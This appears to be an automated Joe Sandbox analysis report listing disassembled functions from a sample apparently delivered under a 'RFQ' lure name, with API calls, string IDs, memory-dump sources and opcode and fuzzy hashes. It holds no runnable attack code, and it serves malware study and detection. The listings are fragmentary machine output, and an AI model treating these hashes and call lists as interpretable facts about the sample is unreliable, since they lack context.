                                                        • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                        • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                        Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$__wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                        • API String ID: 790654849-32604322
                                                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                        Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                                                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                        • Opcode Fuzzy Hash: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                                                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                        Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                        • _fseek.LIBCMT ref: 00452B3B
                                                        • __wsplitpath.LIBCMT ref: 00452B9B
                                                        • _wcscpy.LIBCMT ref: 00452BB0
                                                        • _wcscat.LIBCMT ref: 00452BC5
                                                        • __wsplitpath.LIBCMT ref: 00452BEF
                                                        • _wcscat.LIBCMT ref: 00452C07
                                                        • _wcscat.LIBCMT ref: 00452C1C
                                                        • __fread_nolock.LIBCMT ref: 00452C53
                                                        • __fread_nolock.LIBCMT ref: 00452C64
                                                        • __fread_nolock.LIBCMT ref: 00452C83
                                                        • __fread_nolock.LIBCMT ref: 00452C94
                                                        • __fread_nolock.LIBCMT ref: 00452CB5
                                                        • __fread_nolock.LIBCMT ref: 00452CC6
                                                        • __fread_nolock.LIBCMT ref: 00452CD7
                                                        • __fread_nolock.LIBCMT ref: 00452CE8
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                        • __fread_nolock.LIBCMT ref: 00452D78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                        • String ID:
                                                        • API String ID: 2054058615-0
                                                        • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                        • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                        • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                        • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                        Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window
                                                        • String ID: 0
                                                        • API String ID: 2353593579-4108050209
                                                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                        Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                        • GetWindowDC.USER32(?), ref: 0044A0F6
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                        • GetSysColor.USER32(0000000F), ref: 0044A131
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                        • GetSysColor.USER32(00000005), ref: 0044A15B
                                                        • GetWindowDC.USER32(?), ref: 0044A1BE
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                        • GetSysColor.USER32(00000008), ref: 0044A265
                                                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                        • String ID:
                                                        • API String ID: 1744303182-0
                                                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                        Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                        • __mtterm.LIBCMT ref: 00417C34
                                                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                        • __init_pointers.LIBCMT ref: 00417CE6
                                                        • __calloc_crt.LIBCMT ref: 00417D54
                                                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                        • API String ID: 4163708885-3819984048
                                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                        Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2485277191-404129466
                                                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                        Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                        • SetWindowTextW.USER32(?,?), ref: 00454678
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                        • GetWindowRect.USER32(?,?), ref: 004546F5
                                                        • SetWindowTextW.USER32(?,?), ref: 00454765
                                                        • GetDesktopWindow.USER32 ref: 0045476F
                                                        • GetWindowRect.USER32(00000000), ref: 00454776
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                        • GetClientRect.USER32(?,?), ref: 004547D2
                                                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                        • String ID:
                                                        • API String ID: 3869813825-0
                                                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                        Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00464B28
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                        • _wcslen.LIBCMT ref: 00464C28
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                        • _wcslen.LIBCMT ref: 00464CBA
                                                        • _wcslen.LIBCMT ref: 00464CD0
                                                        • _wcslen.LIBCMT ref: 00464CEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Directory$CurrentSystem
                                                        • String ID: D
                                                        • API String ID: 1914653954-2746444292
                                                        • Opcode ID: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                                                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                        • Opcode Fuzzy Hash: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                                                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                        Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcsncpy.LIBCMT ref: 0045CE39
                                                        • __wsplitpath.LIBCMT ref: 0045CE78
                                                        • _wcscat.LIBCMT ref: 0045CE8B
                                                        • _wcscat.LIBCMT ref: 0045CE9E
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                        • _wcscpy.LIBCMT ref: 0045CF61
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                        • String ID: *.*
                                                        • API String ID: 1153243558-438819550
                                                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                        Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll
                                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                        • API String ID: 3832890014-4202584635
                                                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                        Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                        • GetFocus.USER32 ref: 0046A0DD
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$CtrlFocus
                                                        • String ID: 0
                                                        • API String ID: 1534620443-4108050209
